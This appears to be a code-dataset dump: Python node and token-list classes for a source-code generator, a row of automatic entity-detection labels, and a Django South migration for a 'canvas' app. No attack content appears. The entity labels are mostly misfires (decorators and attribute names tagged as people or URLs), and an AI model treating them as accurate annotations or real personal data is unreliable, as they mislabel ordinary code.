and the result should be taken into account by the consumer that used :func:`listify` on it. If it was not the case,
the consumer using :func:`listify` would end up with a list of nodes frozen at the time :func:`listify` is called.
The other important aspect of this class is that it can guarantee the type of the contained nodes, even when
overloaded operators like *+=* are used. See the *node_classinfo* and *node_factory* constructor arguments.
"""
default_node_classinfo = (NodeABC,)
def __init__(self, node_list=None, node_classinfo=None, node_factory=None, *args, **kwargs):
"""
:param node_list: the list of nodes that the container contains
:param node_classinfo: a tuple of classes used to check the nodes that enters the container.
If a node is not an instance of one of the *node_classinfo* classes, it is
passed to *node_factory*. All of the classes in *node_classinfo* must be
subclasses of :class:`NodeABC`.
:param node_factory: a factory used when an object which is not an instance of one of the classes of
*node_classinfo* tries to enter the container. The return value of this factory
is then allowed inside.
"""
node_classinfo_tuple = tuple(listify(node_classinfo))
for classinfo in node_classinfo_tuple:
if not issubclass(classinfo, NodeABC):
raise ValueError('node_classinfo must be a subclass of NodeABC')
node_list = listify(node_list)
if node_classinfo is None:
self.node_classinfo = self.default_node_classinfo
else:
self.node_classinfo = node_classinfo_tuple
if node_factory is None:
# If the node_classinfo is None, then self.node_classinfo contains default_node_classinfo
# which is only composed of NodeABC, and therefore cannot be used as a factory
if node_classinfo is None:
raise ValueError(
'You must specify a node factory or give a class that can be used as a factory as first item of node_classinfo'
)
# The first element in the tuple is taken as the factory
node_factory = self.node_classinfo[0]
# A wrapper to make sure that the output of the node_factory is
# indeed a NodeABC
def make_node_factory_wrapper(factory):
def wrapper(node):
result = factory(node)
if not isinstance(result, NodeABC):
raise ValueError("The node factory did not give a NodeABC")
else:
return result
return wrapper
self.node_factory = make_node_factory_wrapper(node_factory)
self.node_list = [
item if isinstance(item, self.node_classinfo) else self.node_factory(item)
for item in node_list
]
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
"""Print all the contained nodes using their *freestanding_str* method,
because a container is a freestanding context.
It also strips the blank lines at the beginning.
"""
snippet = ""
for node in self.node_list:
if hasattr(node, 'comment'):
snippet += node.comment.freestanding_str(idt)
snippet += node.freestanding_str(idt)
return strip_starting_blank_lines(snippet)
def freestanding_str(self, idt=None):
"""Calls super().freestanding_str, and strip the blank lines
at the beginning.
"""
snippet = super().freestanding_str(idt)
return strip_starting_blank_lines(snippet)
def __copy__(self):
cls = type(self)
new_obj = cls.__new__(cls)
new_obj.__dict__.update(self.__dict__)
new_obj.node_list = copy.copy(self.node_list)
new_obj.node_classinfo = copy.copy(self.node_classinfo)
new_obj.node_factory = copy.copy(self.node_factory)
return new_obj
def clear(self):
# We preserve the object's itself, we do not build a new one
self[:] = []
def insert(self, index, value):
elem_list = listify(value)
for i, elem in enumerate(elem_list):
if not isinstance(elem, self.node_classinfo):
elem = self.node_factory(elem)
self.node_list.insert(index+i, elem)
def index(self, *args, **kwargs):
return self.node_list.index(*args, **kwargs)
def count(self, *args, **kwargs):
return self.node_list.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self.node_list.pop(*args, **kwargs)
def reverse(self):
self.node_list.reverse()
def remove(self, *args, **kwargs):
self.node_list.remove(*args, **kwargs)
@abc.abstractmethod
def __add__(self, other):
return type(self)((self, other))
@abc.abstractmethod
def __radd__(self, other):
return type(self)((other, self))
def __iadd__(self, other):
other_list = listify(other)
typed_other_list = [
item if isinstance(item, self.node_classinfo) else self.node_factory(item)
for item in other_list
]
self.node_list.extend(typed_other_list)
return self
def append(self, other):
self.__iadd__(other)
def extend(self, other_list):
other_list = listify(other_list)
for other in other_list:
self.append(other)
def __mul__(self, other):
if isinstance(other, numbers.Integral):
self_copy = copy.copy(self)
self_copy.node_list = self.node_list * other
return self_copy
else:
return NotImplemented
def __rmul__(self, other):
return self.__mul__(other)
def __imul__(self, other):
if isinstance(other, numbers.Integral):
self.node_list *= other
return self
else:
return NotImplemented
def __contains__(self, item):
return item in self.node_list
def __reversed__(self):
return reversed(self.node_list)
def __getitem__(self, key):
return self.node_list[key]
def __setitem__(self, key, value):
if not isinstance(value, self.node_classinfo):
value = self.node_factory(value)
self.node_list[key] = value
def __delitem__(self, key):
del self.node_list[key]
def __len__(self):
return len(self.node_list)
def __iter__(self):
return iter(self.node_list)
class TokenListABC(NodeBase, NonIterable, collections.MutableSequence):
"""This class is an abstract base class for all classes that are token lists.
A token list is an object that holds a sequence of tokens, which get concatenated when printed.
The tokens are turned into strings only when the token list is printed, which is why it is
the lazy building blocks of source code constructs like expressions and many others.
Whan printed, the token list should call *inline_str* on its tokens if the token is a :class:`NodeABC`,
or the builtin :func:`str` otherwise.
"""
pass
class DelegatedTokenListBase(TokenListABC):
"""This is the base class for token lists classes that forward the calls to the :class:`TokenListABC` API
to an attribute.
This class implements stubs to allow transparent object composition.
"""
@property
def tokenlist_attr(self):
"""This property gives the attribute holding the real token list."""
attr = getattr(self, self.tokenlist_attr_name)
if not isinstance(attr, TokenListABC):
raise AttributeError('The attribute '+self.tokenlist_attr_name+' is not a TokenListABC')
else:
return attr
@tokenlist_attr.setter
def tokenlist_attr(self, value):
return setattr(self, self.tokenlist_attr_name, value)
def __init__(self, tokenlist_attr_name, *args, **kwargs):
"""
:param tokenlist_attr_name: the name of the attribute holding the real token list
"""
self.tokenlist_attr_name = tokenlist_attr_name
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
return self.tokenlist_attr.inline_str(idt)
def freestanding_str(self, idt=None):
return self.tokenlist_attr.freestanding_str(idt)
def index(self, *args, **kwargs):
return self.tokenlist_attr.index(*args, **kwargs)
def insert(self, *args, **kwargs):
return self.tokenlist_attr.insert(*args, **kwargs)
def index(self, *args, **kwargs):
return self.tokenlist_attr.index(*args, **kwargs)
def count(self, *args, **kwargs):
return self.tokenlist_attr.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self.tokenlist_attr.pop(*args, **kwargs)
def reverse(self):
self.tokenlist_attr.reverse()
def remove(self, *args, **kwargs):
self.tokenlist_attr.remove(*args, **kwargs)
def __add__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__add__(other)
return self_copy
def __radd__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__radd__(other)
return self_copy
def append(self, other):
self.tokenlist_attr.append(other)
def __iadd__(self, *args, **kwargs):
self.tokenlist_attr.__iadd__(*args, **kwargs)
return self
def extend(self, other_list):
self.tokenlist_attr.extend(other_list)
def __mul__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__mul__(other)
return self_copy
def __rmul__(self, *args, **kwargs):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__rmul__(*args, **kwargs)
return self_copy
def __imul__(self, other):
self.tokenlist_attr.__imul__(other)
return self
def __contains__(self, *args, **kwargs):
return self.tokenlist_attr.__contains__(*args, **kwargs)
def __iter__(self):
return self.tokenlist_attr.__iter__()
def __reversed__(self):
return self.tokenlist_attr.__reversed__()
def __getitem__(self, key):
return self.tokenlist_attr.__getitem__(key)
def __setitem__(self, key, value):
self.tokenlist_attr.__setitem__(key, value)
def __delitem__(self, key):
self.tokenlist_attr.__delitem__(key)
def __len__(self):
return self.tokenlist_attr.__len__()
class TokenListBase(TokenListABC):
"""This base class implements the :class:`TokenListABC` API with all of the operators overloading logic.
"""
def __init__(self, token_list=None, *args, **kwargs):
"""
:param token_list: the list of tokens to store inside the token list
"""
self._token_list = listify(token_list)
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
"""Print the tokens of the token list usin, and concatenate all the strings.
If the token is a :class:`NodeABC`, its *inline_str* method is used.
otherwise, :func:`str` builtin is called on the token.
"""
string = ''
for token in self._token_list:
if token is self:
# Special handling of self: allows to print itself using
# a different method to avoid infinite recursion and to provide
# a mean to subclasses to implement self printing without creating a
# "self-printer" class dedicated to printing themselves
string += self.self_inline_str(idt)
elif isinstance(token, NodeABC):
string += token.inline_str(idt)
else:
string += str(token)
return string
def index(self, *args, **kwargs):
return self._token_list.index(*args, **kwargs)
def insert(self, *args, **kwargs):
return self._token_list.insert(*args, **kwargs)
def index(self, *args, **kwargs):
return self._token_list.index(*args, **kwargs)
def count(self, *args, **kwargs):
return self._token_list.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self._token_list.pop(*args, **kwargs)
def reverse(self):
self._token_list.reverse()
def remove(self, *args, **kwargs):
self._token_list.remove(*args, **kwargs)
def __add__(self, other):
if isinstance(other, TokenListABC):
other_list = list(other)
self_copy = copy.copy(self)
self_copy._token_list = self._token_list+other_list
return self_copy
# The result of the addition with a NodeContainer is a NodeContainer
elif isinstance(other, NodeContainerBase):
return other.__radd__(self)
else:
other_list = listify(other)
self_copy = copy.copy(self)
self_copy._token_list = self._token_list+other_list
return self_copy
def __radd__(self, other):
other_list = listify(other)
self_copy = copy.copy(self)
self_copy._token_list = other_list+self._token_list
return self_copy
def append(self, other):
if isinstance(other, TokenListABC):
other_list = tuple(other)
else:
other_list = listify(other)
self._token_list.extend(other_list)
return self
def __iadd__(self, *args, **kwargs):
self.append(*args, **kwargs)
return self
def extend(self, other_list):
other_list = listify(other_list)
for other in other_list:
self.append(other)
def __mul__(self, other):
if isinstance(other, numbers.Integral):
self_copy = copy.copy(self)
self_copy._token_list = self._token_list * other
return self_copy
else:
return NotImplemented
def __rmul__(self, *args, **kwargs):
return self.__mul__(*args, **kwargs)
def __imul__(self, other):
if isinstance(other, numbers.Integral):
self._token_list *= other
return self
else:
return NotImplemented
def __contains__(self, *args, **kwargs):
return self._token_list.__contains__(*args, **kwargs)
def __iter__(self):
return iter(self._token_list)
def __reversed__(self):
return reversed(self._token_list)
def __getitem__(self, key):
return self._token_list[key]
def __setitem__(self, key, value):
self._token_list[key] = value
def __delitem__(self, key):
del self._token_list[key]
def __len__(self):
return len(self._token_list)
class _IndentedTokenListBase:
"""This class is the base class that implements a token list which indents its content when printed."""
def inline_str(self, idt=None):
idt = Indentation.ensure_idt(idt)
snippet = super().inline_str(idt)
indented_new_line = "\n"+str(idt)
snippet = snippet.replace("\n", indented_new_line)
return snippet
class IndentedTokenListBase(_IndentedTokenListBase, TokenListBase):
"""This class is a base class for token lists that indent their content when printed."""
pass
class IndentedDelegatedTokenListBase(_IndentedTokenListBase, DelegatedTokenListBase):
"""This is a mix between :class:`DelegatedTokenListBase` and :class:`IndentedTokenListBase`."""
pass
class BacktraceBase(TokenListBase, NonIterable, metaclass=abc.ABCMeta):
"""This base class allows the instances to record the backtrace of the Python code that
created them.
This allows one to add comments in generated source code showing which file and line of the Python
script was responsible for creating it. This is a facility when debugging the source code generator,
and can avoid headache when ones want to track down which line of Python generated which line of
generated source code.
As a convenience, it is a subclass of :class:`TokenListBase` so it can be used inside a comment for example.
"""
__frame_format_string = '{filename}:{lineno}({function})'
__frame_joiner = ', '
def __init__(self, level=0, *args, **kwargs):
stack = inspect.stack()
self.stack_frame_list = [
frame[1:] for frame in stack
if os.path.dirname(frame[1]) != os.path.dirname(__file__)
]
super().__init__(self, *args, **kwargs)
@abc.abstractmethod
def freestanding_str(self, idt=None):
#Construct a comment by giving itself as a token and use its freestanding_str method
pass
def self_inline_str(self, idt=None):
return self.__frame_joiner.join(
self.__frame_format_string.format(
filename = os.path.relpath(frame[0]),
lineno = frame[1],
function = frame[2],
line_content = frame[3][frame[4]] if frame[3] is not None else ''
) for frame in self.stack_frame_list
)
| 41,613 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'lower_underscore_case'], ['PERSON', "bases[0].__dict__['_'+bases[0].__name__+'__format_string"], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self.comment'], ['PERSON', 'decl'], ['PERSON', 'freestanding_str'], ['PERSON', 'decl'], ['LOCATION', 'self.descriptor.__set__(instance'], ['PERSON', 'freestanding_str = inline_str\n\n'], ['PERSON', 'default_node_classinfo ='], ['PERSON', "ValueError('node_classinfo"], ['NRP', 'node_list'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['PERSON', '@abc.abstractmethod'], ['PERSON', '@abc.abstractmethod'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self_copy.node_list'], ['LOCATION', 'self.node_classinfo'], ['PERSON', 'Whan'], ['PERSON', '@tokenlist_attr.setter\n def'], ['LOCATION', 'TokenListBase'], ['LOCATION', 'IndentedDelegatedTokenListBase(_IndentedTokenListBase'], ['PERSON', '@abc.abstractmethod'], ['PERSON', 'lineno ='], ['PERSON', 'line_content = frame[3][frame[4]'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'collections.It'], ['URL', 'collections.It'], ['URL', 'token.ca'], ['URL', 'token.ca'], ['URL', 'idt.in'], ['URL', 'numbers.Int'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'collections.It'], ['URL', 'NodeABC.in'], ['URL', 'NodeABC.se'], ['URL', 'self.in'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL', 'inspect.is'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'parent.ad'], ['URL', 'self.in'], ['URL', 'self.de'], ['URL', 'decl.fr'], ['URL', 'self.de'], ['URL', 'defi.fr'], ['URL', 'self.fr'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.pa'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'collections.Mu'], ['URL', 'collections.Mu'], ['URL', 'self.no'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'node.comment.fr'], ['URL', 'node.fr'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'copy.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'collections.Mu'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.se'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.fr'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.co'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.se'], ['URL', 'token.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.co'], ['URL', 'list.re'], ['URL', 'list.re'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'snippet.re'], ['URL', 'inspect.st'], ['URL', 'self.st'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'joiner.jo'], ['URL', 'string.fo'], ['URL', 'os.path.re'], ['URL', 'self.st']] |
41 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
db.execute("create index canvas_comment_id_and_visibility_and_parent_comment_id on canvas_comment (id, visibility, parent_comment_id);")
def backwards(self, orm):
raise RuntimeError("Cannot reverse this migration.")
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '254', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'canvas.apiapp': {
'Meta': {'object_name': 'APIApp'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'canvas.apiauthtoken': {
'Meta': {'unique_together': "(('user', 'app'),)", 'object_name': 'APIAuthToken'},
'app': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.APIApp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'canvas.bestof': {
'Meta': {'object_name': 'BestOf'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'best_of'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}),
'chosen_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'best_of'", 'to': "orm['canvas.Comment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {})
},
'canvas.category': {
'Meta': {'object_name': 'Category'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '140'}),
'founded': ('django.db.models.fields.FloatField', [], {'default': '1298956320'}),
'founder': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'founded_groups'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderators': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'moderated_categories'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.comment': {
'Meta': {'object_name': 'Comment'},
'anonymous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'comments'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'127.0.0.1'", 'max_length': '15'}),
'judged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'ot_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'replies'", 'null': 'True', 'blank': 'True', 'to': "orm['canvas.Comment']"}),
'parent_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'to': "orm['canvas.Content']"}),
'posted_on_quest_of_the_day': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'replied_comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['canvas.Comment']", 'null': 'True', 'blank': 'True'}),
'reply_content': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'used_in_comments'", 'null': 'True', 'to': "orm['canvas.Content']"}),
'reply_text': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0', 'db_index': 'True'}),
'skip_moderation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'star_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'blank': 'True'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.commentflag': {
'Meta': {'object_name': 'CommentFlag'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'flags'", 'to': "orm['canvas.Comment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'type_id': ('django.db.models.fields.IntegerField', [], {}),
'undone': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'flags'", 'to': "orm['auth.User']"})
},
'canvas.commentmoderationlog': {
'Meta': {'object_name': 'CommentModerationLog'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'note': ('django.db.models.fields.TextField', [], {}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderated_comments_log'", 'to': "orm['auth.User']"}),
'visibility': ('django.db.models.fields.IntegerField', [], {})
},
'canvas.commentpin': {
'Meta': {'object_name': 'CommentPin'},
'auto': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'canvas.commentsticker': {
'Meta': {'object_name': 'CommentSticker'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stickers'", 'to': "orm['canvas.Comment']"}),
'epic_message': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '140', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'type_id': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'canvas.commentstickerlog': {
'Meta': {'object_name': 'CommentStickerLog'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.Comment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'canvas.content': {
'Meta': {'object_name': 'Content'},
'alpha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'animated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),
'ip': ('django.db.models.fields.IPAddressField', [], {'default': "'127.0.0.1'", 'max_length': '15'}),
'remix_of': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'remixes'", 'null': 'True', 'to': "orm['canvas.Content']"}),
'remix_text': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1000', 'blank': 'True'}),
'source_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4000', 'blank': 'True'}),
'stamps_used': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'used_as_stamp'", 'blank': 'True', 'to': "orm['canvas.Content']"}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'url_mapping': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['canvas.ContentUrlMapping']", 'null': 'True', 'blank': 'True'}),
'visibility': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'canvas.contenturlmapping': {
'Meta': {'object_name': 'ContentUrlMapping'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'canvas.emailunsubscribe': {
'Meta': {'object_name': 'EmailUnsubscribe'},
'email': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'canvas.externalcontent': {
'Meta': {'object_name': 'ExternalContent'},
'_data': ('django.db.models.fields.TextField', [], {'default': "'{}'"}),
'content_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent_comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'external_content'", 'to': "orm['canvas.Comment']"}),
'source_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4000', 'null': 'True', 'blank': 'True'})
},
'canvas.facebookinvite': {
'Meta': {'object_name': 'FacebookInvite'},
'fb_message_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invited_fbid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'invitee': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'facebook_invited_from'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'facebook_sent_invites'", 'null': 'True', 'blank': 'True', 'to': "orm['auth.User']"})
},
'canvas.facebookuser': {
'Meta': {'object_name': 'FacebookUser'},
'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'fb_uid': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'gender': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_invited': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
